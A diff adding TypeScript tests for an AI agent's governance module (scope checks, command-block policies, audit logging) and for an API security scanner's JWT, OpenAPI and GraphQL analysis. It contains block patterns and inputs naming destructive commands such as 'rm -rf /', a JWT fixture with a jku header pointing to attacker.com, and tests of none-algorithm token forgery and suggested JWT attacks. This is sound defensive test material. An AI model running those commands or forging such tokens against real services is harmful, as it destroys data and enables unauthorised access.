+        allow: ["10.0.0.0/8"],
+        deny: ["10.0.0.1/32"]
+      }
+    })
+    expect(result.allowed).toBe(false)
+    expect(result.reason).toContain("matches deny pattern")
+  })
+
+  test("allows domain in allowed list", () => {
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "api.company.com", type: "domain", normalized: "api.company.com" }
+    ]
+    const result = GovernanceScope.check(targets, {
+      domain: { allow: ["*.company.com"] }
+    })
+    expect(result.allowed).toBe(true)
+  })
+
+  test("denies domain matching deny list", () => {
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "prod.company.com", type: "domain", normalized: "prod.company.com" }
+    ]
+    const result = GovernanceScope.check(targets, {
+      domain: {
+        allow: ["*.company.com"],
+        deny: ["prod.*"]
+      }
+    })
+    expect(result.allowed).toBe(false)
+  })
+
+  test("checks multiple targets and fails on first violation", () => {
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "10.0.0.5", type: "ip", normalized: "10.0.0.5" },
+      { raw: "8.8.8.8", type: "ip", normalized: "8.8.8.8" }
+    ]
+    const result = GovernanceScope.check(targets, {
+      ip: { allow: ["10.0.0.0/8"] }
+    })
+    expect(result.allowed).toBe(false)
+    expect(result.reason).toContain("8.8.8.8")
+  })
+})
+
+describe("GovernancePolicy", () => {
+  test("returns default action when no policies defined", () => {
+    const result = GovernancePolicy.evaluate(
+      "bash",
+      { command: "ls" },
+      [],
+      undefined,
+      "require-approval"
+    )
+    expect(result.action).toBe("require-approval")
+  })
+
+  test("matches policy by tool name", () => {
+    const policies: GovernancePolicy.PolicyConfig[] = [
+      { action: "auto-approve", tools: ["read", "glob", "grep"] }
+    ]
+    const result = GovernancePolicy.evaluate("read", {}, [], policies, "require-approval")
+    expect(result.action).toBe("auto-approve")
+  })
+
+  test("matches policy by tool wildcard", () => {
+    const policies: GovernancePolicy.PolicyConfig[] = [
+      { action: "auto-approve", tools: ["mcp_*"] }
+    ]
+    const result = GovernancePolicy.evaluate("mcp_slack", {}, [], policies, "require-approval")
+    expect(result.action).toBe("auto-approve")
+  })
+
+  test("matches policy by bash command pattern", () => {
+    const policies: GovernancePolicy.PolicyConfig[] = [
+      { action: "blocked", tools: ["bash"], commands: ["rm -rf *"] }
+    ]
+    const result = GovernancePolicy.evaluate(
+      "bash",
+      { command: "rm -rf /tmp/foo" },
+      [],
+      policies,
+      "require-approval"
+    )
+    expect(result.action).toBe("blocked")
+  })
+
+  test("does not match command pattern for non-bash tools", () => {
+    const policies: GovernancePolicy.PolicyConfig[] = [
+      { action: "blocked", commands: ["rm *"] }
+    ]
+    const result = GovernancePolicy.evaluate("read", {}, [], policies, "require-approval")
+    expect(result.action).toBe("require-approval")
+  })
+
+  test("matches policy by target pattern", () => {
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "prod.company.com", type: "domain", normalized: "prod.company.com" }
+    ]
+    const policies: GovernancePolicy.PolicyConfig[] = [
+      { action: "blocked", targets: ["*.prod.*", "prod.*"] }
+    ]
+    const result = GovernancePolicy.evaluate("bash", {}, targets, policies, "require-approval")
+    expect(result.action).toBe("blocked")
+  })
+
+  test("first matching policy wins", () => {
+    const policies: GovernancePolicy.PolicyConfig[] = [
+      { action: "blocked", tools: ["bash"], commands: ["rm -rf *"], description: "Block dangerous" },
+      { action: "auto-approve", tools: ["bash"], description: "Allow bash" }
+    ]
+
+    // Dangerous command matches first policy
+    const result1 = GovernancePolicy.evaluate(
+      "bash",
+      { command: "rm -rf /" },
+      [],
+      policies,
+      "require-approval"
+    )
+    expect(result1.action).toBe("blocked")
+    expect(result1.matchedPolicy).toBe("Block dangerous")
+
+    // Safe command matches second policy
+    const result2 = GovernancePolicy.evaluate(
+      "bash",
+      { command: "ls -la" },
+      [],
+      policies,
+      "require-approval"
+    )
+    expect(result2.action).toBe("auto-approve")
+    expect(result2.matchedPolicy).toBe("Allow bash")
+  })
+
+  test("requires ALL conditions to match (AND logic)", () => {
+    const policies: GovernancePolicy.PolicyConfig[] = [
+      { action: "blocked", tools: ["bash"], commands: ["ssh *"], targets: ["*.prod.*"] }
+    ]
+
+    // Has tool and command but no matching target
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "dev.company.com", type: "domain", normalized: "dev.company.com" }
+    ]
+    const result = GovernancePolicy.evaluate(
+      "bash",
+      { command: "ssh user@dev.company.com" },
+      targets,
+      policies,
+      "require-approval"
+    )
+    expect(result.action).toBe("require-approval") // Doesn't match because target doesn't match
+  })
+
+  test("describe formats policy correctly", () => {
+    const policy: GovernancePolicy.PolicyConfig = {
+      action: "blocked",
+      tools: ["bash"],
+      commands: ["ssh *"],
+      description: "Block SSH"
+    }
+    const desc = GovernancePolicy.describe(policy)
+    expect(desc).toContain("Block SSH")
+    expect(desc).toContain("blocked")
+    expect(desc).toContain("bash")
+    expect(desc).toContain("ssh *")
+  })
+})
+
+describe("GovernanceAudit", () => {
+  beforeEach(() => {
+    GovernanceAudit.clearMemory()
+  })
+
+  test("records entry to memory", async () => {
+    const entry = await GovernanceAudit.record(
+      {
+        sessionID: "test-session",
+        callID: "test-call",
+        tool: "bash",
+        targets: [],
+        outcome: "allowed",
+        reason: "Test",
+        args: { command: "ls" },
+        duration: 5
+      },
+      { storage: "memory", include_args: true }
+    )
+
+    expect(entry.id).toBeDefined()
+    expect(entry.timestamp).toBeDefined()
+    expect(entry.tool).toBe("bash")
+    expect(entry.outcome).toBe("allowed")
+    expect(entry.args).toEqual({ command: "ls" })
+  })
+
+  test("strips args when include_args is false", async () => {
+    const entry = await GovernanceAudit.record(
+      {
+        sessionID: "test-session",
+        callID: "test-call",
+        tool: "bash",
+        targets: [],
+        outcome: "allowed",
+        args: { command: "secret-command" },
+        duration: 5
+      },
+      { storage: "memory", include_args: false }
+    )
+
+    expect(entry.args).toBeUndefined()
+  })
+
+  test("lists entries from memory", async () => {
+    await GovernanceAudit.record(
+      { sessionID: "s1", callID: "c1", tool: "read", targets: [], outcome: "allowed", duration: 1 },
+      { storage: "memory" }
+    )
+    await GovernanceAudit.record(
+      { sessionID: "s1", callID: "c2", tool: "bash", targets: [], outcome: "denied", duration: 2 },
+      { storage: "memory" }
+    )
+
+    const all = await GovernanceAudit.list({ storage: "memory" })
+    expect(all.length).toBe(2)
+
+    const denied = await GovernanceAudit.list({ storage: "memory" }, { outcome: "denied" })
+    expect(denied.length).toBe(1)
+    expect(denied[0].tool).toBe("bash")
+  })
+
+  test("memoryCount returns correct count", async () => {
+    expect(GovernanceAudit.memoryCount()).toBe(0)
+
+    await GovernanceAudit.record(
+      { sessionID: "s1", callID: "c1", tool: "read", targets: [], outcome: "allowed", duration: 1 },
+      { storage: "memory" }
+    )
+
+    expect(GovernanceAudit.memoryCount()).toBe(1)
+  })
+
+  test("clearMemory resets buffer", async () => {
+    await GovernanceAudit.record(
+      { sessionID: "s1", callID: "c1", tool: "read", targets: [], outcome: "allowed", duration: 1 },
+      { storage: "memory" }
+    )
+    expect(GovernanceAudit.memoryCount()).toBe(1)
+
+    GovernanceAudit.clearMemory()
+    expect(GovernanceAudit.memoryCount()).toBe(0)
+  })
+})
diff --git a/packages/opencode/test/governance/test-standalone.ts b/packages/opencode/test/governance/test-standalone.ts
new file mode 100644
index 00000000000..699a873be43
--- /dev/null
+++ b/packages/opencode/test/governance/test-standalone.ts
@@ -0,0 +1,267 @@
+/**
+ * Standalone Governance Test Script
+ *
+ * Run with: bun run test/governance/test-standalone.ts
+ * Or: npx tsx test/governance/test-standalone.ts
+ *
+ * This script tests the governance module without requiring a test framework.
+ */
+
+import { GovernanceMatcher } from "../../src/governance/matcher"
+import { GovernanceScope } from "../../src/governance/scope"
+import { GovernancePolicy } from "../../src/governance/policy"
+import { GovernanceAudit } from "../../src/governance/audit"
+import { GovernanceTypes } from "../../src/governance/types"
+
+// Simple test utilities
+let passed = 0
+let failed = 0
+
+function test(name: string, fn: () => void) {
+  try {
+    fn()
+    console.log(`✓ ${name}`)
+    passed++
+  } catch (err) {
+    console.log(`✗ ${name}`)
+    console.log(`  Error: ${err instanceof Error ? err.message : err}`)
+    failed++
+  }
+}
+
+function expect<T>(actual: T) {
+  return {
+    toBe(expected: T) {
+      if (actual !== expected) {
+        throw new Error(`Expected ${JSON.stringify(expected)}, got ${JSON.stringify(actual)}`)
+      }
+    },
+    toContain(expected: string) {
+      if (typeof actual !== "string" || !actual.includes(expected)) {
+        throw new Error(`Expected "${actual}" to contain "${expected}"`)
+      }
+    },
+    toBeGreaterThanOrEqual(expected: number) {
+      if (typeof actual !== "number" || actual < expected) {
+        throw new Error(`Expected ${actual} >= ${expected}`)
+      }
+    }
+  }
+}
+
+// ============================================================================
+// Tests
+// ============================================================================
+
+console.log("\n=== GovernanceMatcher Tests ===\n")
+
+test("classifyTarget: IPv4 address", () => {
+  const target = GovernanceMatcher.classifyTarget("192.168.1.1")
+  expect(target.type).toBe("ip")
+  expect(target.normalized).toBe("192.168.1.1")
+})
+
+test("classifyTarget: CIDR notation", () => {
+  const target = GovernanceMatcher.classifyTarget("10.0.0.0/8")
+  expect(target.type).toBe("cidr")
+})
+
+test("classifyTarget: domain", () => {
+  const target = GovernanceMatcher.classifyTarget("example.com")
+  expect(target.type).toBe("domain")
+})
+
+test("classifyTarget: URL extracts hostname", () => {
+  const target = GovernanceMatcher.classifyTarget("https://API.Example.COM/v1")
+  expect(target.type).toBe("url")
+  expect(target.normalized).toBe("api.example.com")
+})
+
+test("extractTargets: bash curl command", () => {
+  const targets = GovernanceMatcher.extractTargets("bash", {
+    command: "curl https://api.example.com/data"
+  })
+  expect(targets.length).toBeGreaterThanOrEqual(1)
+  expect(targets[0].normalized).toBe("api.example.com")
+})
+
+test("extractTargets: bash SSH command", () => {
+  const targets = GovernanceMatcher.extractTargets("bash", {
+    command: "ssh admin@server.company.com"
+  })
+  expect(targets.length).toBeGreaterThanOrEqual(1)
+})
+
+test("extractTargets: webfetch URL", () => {
+  const targets = GovernanceMatcher.extractTargets("webfetch", {
+    url: "https://api.github.com"
+  })
+  expect(targets.length).toBe(1)
+  expect(targets[0].normalized).toBe("api.github.com")
+})
+
+test("ipInCidr: IP in /8 range", () => {
+  expect(GovernanceMatcher.ipInCidr("10.1.2.3", "10.0.0.0/8")).toBe(true)
+  expect(GovernanceMatcher.ipInCidr("11.0.0.0", "10.0.0.0/8")).toBe(false)
+})
+
+test("ipInCidr: IP in /24 range", () => {
+  expect(GovernanceMatcher.ipInCidr("192.168.1.100", "192.168.1.0/24")).toBe(true)
+  expect(GovernanceMatcher.ipInCidr("192.168.2.1", "192.168.1.0/24")).toBe(false)
+})
+
+console.log("\n=== GovernanceScope Tests ===\n")
+
+test("scope: allows when no config", () => {
+  const targets: GovernanceTypes.Target[] = [
+    { raw: "10.0.0.1", type: "ip", normalized: "10.0.0.1" }
+  ]
+  const result = GovernanceScope.check(targets, undefined)
+  expect(result.allowed).toBe(true)
+})
+
+test("scope: allows IP in allowed CIDR", () => {
+  const targets: GovernanceTypes.Target[] = [
+    { raw: "10.0.0.5", type: "ip", normalized: "10.0.0.5" }
+  ]
+  const result = GovernanceScope.check(targets, {
+    ip: { allow: ["10.0.0.0/8"] }
+  })
+  expect(result.allowed).toBe(true)
+})
+
+test("scope: denies IP not in allowed range", () => {
+  const targets: GovernanceTypes.Target[] = [
+    { raw: "8.8.8.8", type: "ip", normalized: "8.8.8.8" }
+  ]
+  const result = GovernanceScope.check(targets, {
+    ip: { allow: ["10.0.0.0/8"] }
+  })
+  expect(result.allowed).toBe(false)
+})
+
+test("scope: deny takes precedence over allow", () => {
+  const targets: GovernanceTypes.Target[] = [
+    { raw: "10.0.0.1", type: "ip", normalized: "10.0.0.1" }
+  ]
+  const result = GovernanceScope.check(targets, {
+    ip: { allow: ["10.0.0.0/8"], deny: ["10.0.0.1/32"] }
+  })
+  expect(result.allowed).toBe(false)
+})
+
+test("scope: allows domain matching pattern", () => {
+  const targets: GovernanceTypes.Target[] = [
+    { raw: "api.company.com", type: "domain", normalized: "api.company.com" }
+  ]
+  const result = GovernanceScope.check(targets, {
+    domain: { allow: ["*.company.com"] }
+  })
+  expect(result.allowed).toBe(true)
+})
+
+console.log("\n=== GovernancePolicy Tests ===\n")
+
+test("policy: default action when no policies", () => {
+  const result = GovernancePolicy.evaluate("bash", {}, [], undefined, "require-approval")
+  expect(result.action).toBe("require-approval")
+})
+
+test("policy: matches by tool name", () => {
+  const policies: GovernancePolicy.PolicyConfig[] = [
+    { action: "auto-approve", tools: ["read", "glob"] }
+  ]
+  const result = GovernancePolicy.evaluate("read", {}, [], policies, "require-approval")
+  expect(result.action).toBe("auto-approve")
+})
+
+test("policy: matches bash command pattern", () => {
+  const policies: GovernancePolicy.PolicyConfig[] = [
+    { action: "blocked", tools: ["bash"], commands: ["rm -rf *"] }
+  ]
+  const result = GovernancePolicy.evaluate(
+    "bash",
+    { command: "rm -rf /tmp" },
+    [],
+    policies,
+    "require-approval"
+  )
+  expect(result.action).toBe("blocked")
+})
+
+test("policy: first match wins", () => {
+  const policies: GovernancePolicy.PolicyConfig[] = [
+    { action: "blocked", tools: ["bash"], commands: ["rm *"], description: "Block rm" },
+    { action: "auto-approve", tools: ["bash"], description: "Allow bash" }
+  ]
+
+  const result1 = GovernancePolicy.evaluate(
+    "bash",
+    { command: "rm -rf /" },
+    [],
+    policies,
+    "require-approval"
+  )
+  expect(result1.action).toBe("blocked")
+
+  const result2 = GovernancePolicy.evaluate(
+    "bash",
+    { command: "ls -la" },
+    [],
+    policies,
+    "require-approval"
+  )
+  expect(result2.action).toBe("auto-approve")
+})
+
+console.log("\n=== GovernanceAudit Tests ===\n")
+
+test("audit: records to memory", async () => {
+  GovernanceAudit.clearMemory()
+
+  const entry = await GovernanceAudit.record(
+    {
+      sessionID: "test",
+      callID: "test",
+      tool: "bash",
+      targets: [],
+      outcome: "allowed",
+      duration: 5
+    },
+    { storage: "memory" }
+  )
+
+  expect(entry.tool).toBe("bash")
+  expect(GovernanceAudit.memoryCount()).toBe(1)
+})
+
+test("audit: strips args when include_args=false", async () => {
+  GovernanceAudit.clearMemory()
+
+  const entry = await GovernanceAudit.record(
+    {
+      sessionID: "test",
+      callID: "test",
+      tool: "bash",
+      targets: [],
+      outcome: "allowed",
+      args: { command: "secret" },
+      duration: 5
+    },
+    { storage: "memory", include_args: false }
+  )
+
+  expect(entry.args).toBe(undefined)
+})
+
+// ============================================================================
+// Summary
+// ============================================================================
+
+console.log("\n" + "=".repeat(50))
+console.log(`\nResults: ${passed} passed, ${failed} failed`)
+console.log("")
+
+if (failed > 0) {
+  process.exit(1)
+}
diff --git a/packages/opencode/test/pentest/apiscan.test.ts b/packages/opencode/test/pentest/apiscan.test.ts
new file mode 100644
index 00000000000..1c588c01d72
--- /dev/null
+++ b/packages/opencode/test/pentest/apiscan.test.ts
@@ -0,0 +1,1048 @@
+/**
+ * @fileoverview API Security Scanner Tests
+ *
+ * Tests for API discovery, parsing, authentication testing,
+ * and OWASP API Top 10 categorization.
+ */
+
+import { describe, test, expect, beforeEach, afterEach } from "bun:test"
+import {
+  ApiScanTypes,
+  ApiScanStorage,
+  ApiScanProfiles,
+  OpenApiParser,
+  GraphQLParser,
+  JwtAnalyzer,
+} from "../../src/pentest/apiscan"
+
+describe("JwtAnalyzer", () => {
+  // Test JWT with HS256 algorithm
+  const testJwtHs256 = [
+    Buffer.from(JSON.stringify({ alg: "HS256", typ: "JWT" })).toString("base64url"),
+    Buffer.from(
+      JSON.stringify({
+        sub: "1234567890",
+        name: "Test User",
+        iat: Math.floor(Date.now() / 1000) - 3600,
+        exp: Math.floor(Date.now() / 1000) + 3600,
+        iss: "test-issuer",
+        aud: "test-audience",
+      })
+    ).toString("base64url"),
+    "test-signature",
+  ].join(".")
+
+  // Expired JWT
+  const expiredJwt = [
+    Buffer.from(JSON.stringify({ alg: "RS256", typ: "JWT" })).toString("base64url"),
+    Buffer.from(
+      JSON.stringify({
+        sub: "user123",
+        exp: Math.floor(Date.now() / 1000) - 3600, // Expired 1 hour ago
+        iat: Math.floor(Date.now() / 1000) - 7200,
+      })
+    ).toString("base64url"),
+    "signature",
+  ].join(".")
+
+  // JWT with 'none' algorithm
+  const noneAlgJwt = [
+    Buffer.from(JSON.stringify({ alg: "none", typ: "JWT" })).toString("base64url"),
+    Buffer.from(JSON.stringify({ sub: "admin" })).toString("base64url"),
+    "",
+  ].join(".")
+
+  // JWT with sensitive data
+  const sensitiveJwt = [
+    Buffer.from(JSON.stringify({ alg: "HS256", typ: "JWT" })).toString("base64url"),
+    Buffer.from(
+      JSON.stringify({
+        sub: "user",
+        password: "secret123",
+        creditCard: "4111111111111111",
+      })
+    ).toString("base64url"),
+    "sig",
+  ].join(".")
+
+  // JWT with jku header
+  const jkuJwt = [
+    Buffer.from(
+      JSON.stringify({
+        alg: "RS256",
+        typ: "JWT",
+        jku: "https://attacker.com/jwks.json",
+      })
+    ).toString("base64url"),
+    Buffer.from(JSON.stringify({ sub: "user" })).toString("base64url"),
+    "sig",
+  ].join(".")
+
+  describe("analyze", () => {
+    test("decodes JWT and extracts claims", () => {
+      const analysis = JwtAnalyzer.analyze(testJwtHs256)
+
+      expect(analysis.algorithm).toBe("HS256")
+      expect(analysis.subject).toBe("1234567890")
+      expect(analysis.issuer).toBe("test-issuer")
+      expect(analysis.audience).toBe("test-audience")
+      expect(analysis.isExpired).toBe(false)
+    })
+
+    test("detects expired tokens", () => {
+      const analysis = JwtAnalyzer.analyze(expiredJwt)
+
+      expect(analysis.isExpired).toBe(true)
+      expect(analysis.algorithm).toBe("RS256")
+    })
+
+    test("flags 'none' algorithm as critical", () => {
+      const analysis = JwtAnalyzer.analyze(noneAlgJwt)
+
+      expect(analysis.algorithm).toBe("none")
+      expect(analysis.issues.some((i) => i.includes("CRITICAL") && i.includes("none"))).toBe(true)
+    })
+
+    test("warns about symmetric algorithms", () => {
+      const analysis = JwtAnalyzer.analyze(testJwtHs256)
+
+      expect(analysis.issues.some((i) => i.includes("HS256") && i.includes("symmetric"))).toBe(true)
+    })
+
+    test("detects sensitive data in payload", () => {
+      const analysis = JwtAnalyzer.analyze(sensitiveJwt)
+
+      expect(analysis.issues.some((i) => i.includes("password"))).toBe(true)
+      expect(analysis.issues.some((i) => i.includes("creditCard"))).toBe(true)
+    })
+
+    test("warns about jku header", () => {
+      const analysis = JwtAnalyzer.analyze(jkuJwt)
+
+      expect(analysis.issues.some((i) => i.includes("jku"))).toBe(true)
+    })
+
+    test("throws on invalid JWT format", () => {
+      expect(() => JwtAnalyzer.analyze("not-a-jwt")).toThrow()
+      expect(() => JwtAnalyzer.analyze("one.two")).toThrow()
+    })
+  })
+
+  describe("attack vectors", () => {
+    test("suggests none algorithm attack", () => {
+      const analysis = JwtAnalyzer.analyze(testJwtHs256)
+
+      expect(analysis.attackVectors.some((v) => v.toLowerCase().includes("none"))).toBe(true)
+    })
+
+    test("suggests brute force for HMAC algorithms", () => {
+      const analysis = JwtAnalyzer.analyze(testJwtHs256)
+
+      expect(analysis.attackVectors.some((v) => v.toLowerCase().includes("brute"))).toBe(true)
+    })
+
+    test("suggests algorithm confusion for RSA tokens", () => {
+      const analysis = JwtAnalyzer.analyze(expiredJwt)
+
+      expect(analysis.attackVectors.some((v) => v.toLowerCase().includes("confusion"))).toBe(true)
+    })
+
+    test("suggests key injection for jku tokens", () => {
+      const analysis = JwtAnalyzer.analyze(jkuJwt)
+
+      expect(analysis.attackVectors.some((v) => v.toLowerCase().includes("key injection"))).toBe(true)
+    })
+  })
+
+  describe("utility functions", () => {
+    test("isWeakAlgorithm identifies weak algorithms", () => {
+      expect(JwtAnalyzer.isWeakAlgorithm("none")).toBe(true)
+      expect(JwtAnalyzer.isWeakAlgorithm("HS256")).toBe(true)
+      expect(JwtAnalyzer.isWeakAlgorithm("RS256")).toBe(false)
+      expect(JwtAnalyzer.isWeakAlgorithm("ES256")).toBe(false)
+    })
+
+    test("format produces readable output", () => {
+      const analysis = JwtAnalyzer.analyze(testJwtHs256)
+      const formatted = JwtAnalyzer.format(analysis)
+
+      expect(formatted).toContain("JWT Analysis")
+      expect(formatted).toContain("Algorithm: HS256")
+      expect(formatted).toContain("Issuer: test-issuer")
+      expect(formatted).toContain("Security Issues")
+    })
+
+    test("createNoneAlgToken creates token with none algorithm", () => {
+      const analysis = JwtAnalyzer.analyze(testJwtHs256)
+      const noneToken = JwtAnalyzer.createNoneAlgToken(analysis)
+
+      const parts = noneToken.split(".")
+      const header = JSON.parse(Buffer.from(parts[0], "base64url").toString())
+
+      expect(header.alg).toBe("none")
+      expect(parts[2]).toBe("") // Empty signature
+    })
+  })
+})
+
+describe("OpenApiParser", () => {
+  const openapi3Spec = {
+    openapi: "3.0.3",
+    info: {
+      title: "Test API",
+      version: "1.0.0",
+      description: "A test API for unit tests",
+    },
+    servers: [{ url: "https://api.example.com/v1" }],
+    paths: {
+      "/users": {
+        get: {
+          summary: "List users",
+          operationId: "listUsers",
+          parameters: [
+            { name: "limit", in: "query", schema: { type: "integer" }, required: false },
+            { name: "offset", in: "query", schema: { type: "integer" } },
+          ],
+          responses: {
+            "200": {
+              description: "Success",
+              content: { "application/json": { schema: { type: "array" } } },
+            },
+          },
+          security: [{ bearerAuth: [] }],
+        },
+        post: {
+          summary: "Create user",
+          operationId: "createUser",
+          requestBody: {
+            required: true,
+            content: {
+              "application/json": {
+                schema: {
+                  type: "object",
+                  properties: { name: { type: "string" }, email: { type: "string" } },
+                },
+              },
+            },
+          },
+          responses: { "201": { description: "Created" } },
+        },
+      },
+      "/users/{id}": {
+        get: {
+          summary: "Get user",
+          operationId: "getUser",
+          parameters: [{ name: "id", in: "path", required: true, schema: { type: "string" } }],
+          responses: { "200": { description: "Success" } },
+          deprecated: true,
+        },
+        delete: {
+          summary: "Delete user",
+          operationId: "deleteUser",
+          parameters: [{ name: "id", in: "path", required: true, schema: { type: "string" } }],
+          responses: { "204": { description: "Deleted" } },
+        },
+      },
+    },
+    components: {
+      securitySchemes: {
+        bearerAuth: {
+          type: "http",
+          scheme: "bearer",
+          bearerFormat: "JWT",
+        },
+        apiKey: {
+          type: "apiKey",
+          in: "header",
+          name: "X-API-Key",
+        },
+      },
+    },
+  }
+
+  const swagger2Spec = {
+    swagger: "2.0",
+    info: { title: "Swagger API", version: "1.0" },
+    host: "api.example.com",
+    basePath: "/v2",
+    schemes: ["https"],
+    paths: {
+      "/items": {
+        get: {
+          summary: "List items",
+          parameters: [{ name: "page", in: "query", type: "integer" }],
+          responses: { "200": { description: "OK" } },
+        },
+        post: {
+          summary: "Create item",
+          parameters: [
+            {
+              name: "body",
+              in: "body",
+              required: true,
+              schema: { type: "object", properties: { name: { type: "string" } } },
+            },
+          ],
+          responses: { "201": { description: "Created" } },
+        },
+      },
+    },
+    securityDefinitions: {
+      basic: { type: "basic" },
+    },
+  }
+
+  describe("parse", () => {
+    test("parses OpenAPI 3.x specification", () => {
+      const spec = OpenApiParser.parse(openapi3Spec, "https://api.example.com")
+
+      expect(spec.type).toBe("openapi")
+      expect(spec.version).toBe("3.0.3")
+      expect(spec.title).toBe("Test API")
+      expect(spec.endpoints.length).toBeGreaterThan(0)
+    })
+
+    test("parses Swagger 2.0 specification", () => {
+      const spec = OpenApiParser.parse(swagger2Spec, "https://api.example.com")
+
+      expect(spec.type).toBe("openapi")
+      expect(spec.version).toBe("2.0")
+      expect(spec.endpoints.length).toBe(2)
+    })
+
+    test("extracts endpoints with correct methods", () => {
+      const spec = OpenApiParser.parse(openapi3Spec, "https://api.example.com")
+
+      const usersList = spec.endpoints.find((e) => e.path === "/users" && e.method === "GET")
+      const usersCreate = spec.endpoints.find((e) => e.path === "/users" && e.method === "POST")
+      const userGet = spec.endpoints.find((e) => e.path === "/users/{id}" && e.method === "GET")
+
+      expect(usersList).toBeDefined()
+      expect(usersCreate).toBeDefined()
+      expect(userGet).toBeDefined()
+      expect(userGet!.deprecated).toBe(true)
+    })
+
+    test("extracts parameters correctly", () => {
+      const spec = OpenApiParser.parse(openapi3Spec, "https://api.example.com")
+      const usersList = spec.endpoints.find((e) => e.path === "/users" && e.method === "GET")
+
+      expect(usersList!.parameters.some((p) => p.name === "limit" && p.in === "query")).toBe(true)
+    })
+
+    test("extracts request body for POST endpoints", () => {
+      const spec = OpenApiParser.parse(openapi3Spec, "https://api.example.com")
+      const usersCreate = spec.endpoints.find((e) => e.path === "/users" && e.method === "POST")
+
+      expect(usersCreate!.requestBody).toBeDefined()
+      expect(usersCreate!.requestBody!.contentType).toContain("json")
+      expect(usersCreate!.requestBody!.required).toBe(true)
+    })
+
+    test("extracts security schemes", () => {
+      const spec = OpenApiParser.parse(openapi3Spec, "https://api.example.com")
+
+      expect(spec.securitySchemes.length).toBe(2)
+      expect(spec.securitySchemes.some((s) => s.name === "bearerAuth" && s.type === "http")).toBe(true)
+      expect(spec.securitySchemes.some((s) => s.name === "apiKey" && s.type === "apiKey")).toBe(true)
+    })
+
+    test("extracts servers/base paths", () => {
+      const spec = OpenApiParser.parse(openapi3Spec, "https://api.example.com")
+
+      expect(spec.servers).toContain("https://api.example.com/v1")
+    })
+
+    test("handles JSON string input", () => {
+      const spec = OpenApiParser.parse(JSON.stringify(openapi3Spec), "https://api.example.com")
+
+      expect(spec.title).toBe("Test API")
+    })
+  })
+
+  describe("validation", () => {
+    test("isValidSpec returns true for valid specs", () => {
+      expect(OpenApiParser.isValidSpec(openapi3Spec)).toBe(true)
+      expect(OpenApiParser.isValidSpec(swagger2Spec)).toBe(true)
+      expect(OpenApiParser.isValidSpec(JSON.stringify(openapi3Spec))).toBe(true)
+    })
+
+    test("isValidSpec returns false for invalid specs", () => {
+      expect(OpenApiParser.isValidSpec({})).toBe(false)
+      expect(OpenApiParser.isValidSpec({ openapi: "3.0.0" })).toBe(false)
+      expect(OpenApiParser.isValidSpec("invalid json")).toBe(false)
+    })
+  })
+
+  describe("formatSummary", () => {
+    test("formats spec summary correctly", () => {
+      const spec = OpenApiParser.parse(openapi3Spec, "https://api.example.com")
+      const summary = OpenApiParser.formatSummary(spec)
+
+      expect(summary).toContain("Test API")
+      expect(summary).toContain("OpenAPI 3.0.3")
+      expect(summary).toContain("Endpoints:")
+    })
+  })
+})
+
+describe("GraphQLParser", () => {
+  const introspectionResponse = {
+    data: {
+      __schema: {
+        queryType: { name: "Query" },
+        mutationType: { name: "Mutation" },
+        subscriptionType: null,
+        types: [
+          {
+            name: "Query",
+            kind: "OBJECT",
+            fields: [
+              {
+                name: "user",
+                type: { name: "User", kind: "OBJECT", ofType: null },
+                args: [{ name: "id", type: { name: null, kind: "NON_NULL", ofType: { name: "ID", kind: "SCALAR" } } }],
+              },
+              {
+                name: "users",
+                type: { name: null, kind: "LIST", ofType: { name: "User", kind: "OBJECT" } },
+                args: [{ name: "limit", type: { name: "Int", kind: "SCALAR", ofType: null } }],
+              },
+            ],
+          },
+          {
+            name: "Mutation",
+            kind: "OBJECT",
+            fields: [
+              {
+                name: "createUser",
+                type: { name: "User", kind: "OBJECT", ofType: null },
+                args: [
+                  { name: "name", type: { name: null, kind: "NON_NULL", ofType: { name: "String", kind: "SCALAR" } } },
+                ],
+              },
+              {
+                name: "deleteUser",
+                type: { name: "Boolean", kind: "SCALAR", ofType: null },
+                args: [{ name: "id", type: { name: null, kind: "NON_NULL", ofType: { name: "ID", kind: "SCALAR" } } }],
+              },
+            ],
+          },
+          {
+            name: "User",
+            kind: "OBJECT",
+            fields: [
+              { name: "id", type: { name: null, kind: "NON_NULL", ofType: { name: "ID", kind: "SCALAR" } }, args: [] },
+              { name: "name", type: { name: "String", kind: "SCALAR", ofType: null }, args: [] },
+              { name: "email", type: { name: "String", kind: "SCALAR", ofType: null }, args: [] },
+              {
+                name: "password",
+                type: { name: "String", kind: "SCALAR", ofType: null },
+                args: [],
+                deprecationReason: "Use hashedPassword instead",
+              },
+            ],
+          },
+          {
+            name: "Role",
+            kind: "ENUM",
+            enumValues: [{ name: "ADMIN" }, { name: "USER" }, { name: "GUEST" }],
+          },
+        ],
+        directives: [{ name: "skip" }, { name: "include" }, { name: "deprecated" }, { name: "auth" }],
+      },
+    },
+  }
+
+  describe("parse", () => {
+    test("parses GraphQL introspection response", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+
+      expect(spec.type).toBe("graphql")
+      expect(spec.title).toBe("GraphQL API")
+      expect(spec.graphqlSchema).toBeDefined()
+    })
+
+    test("extracts types correctly", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+
+      expect(spec.graphqlSchema!.types.some((t) => t.name === "Query")).toBe(true)
+      expect(spec.graphqlSchema!.types.some((t) => t.name === "User")).toBe(true)
+      expect(spec.graphqlSchema!.types.some((t) => t.name === "Role" && t.kind === "ENUM")).toBe(true)
+    })
+
+    test("extracts root types", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+
+      expect(spec.graphqlSchema!.queryType).toBe("Query")
+      expect(spec.graphqlSchema!.mutationType).toBe("Mutation")
+    })
+
+    test("converts queries to GET endpoints", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+
+      const userQuery = spec.endpoints.find((e) => e.operationId === "user" && e.method === "GET")
+      const usersQuery = spec.endpoints.find((e) => e.operationId === "users" && e.method === "GET")
+
+      expect(userQuery).toBeDefined()
+      expect(usersQuery).toBeDefined()
+    })
+
+    test("converts mutations to POST endpoints", () => {
+      const spec = GraphQLParser.parse(introspectionResponse, "https://api.example.com/graphql")
+
+      const createMutation = spec.endpoints.find((e) => e.operationId === "createUser" && e.method === "POST")
+      const deleteMutation = spec.endpoints.find((e) => e.operationId === "deleteUser" && e.method === "POST")
+
+      expect(createMutation).toBeDefined()
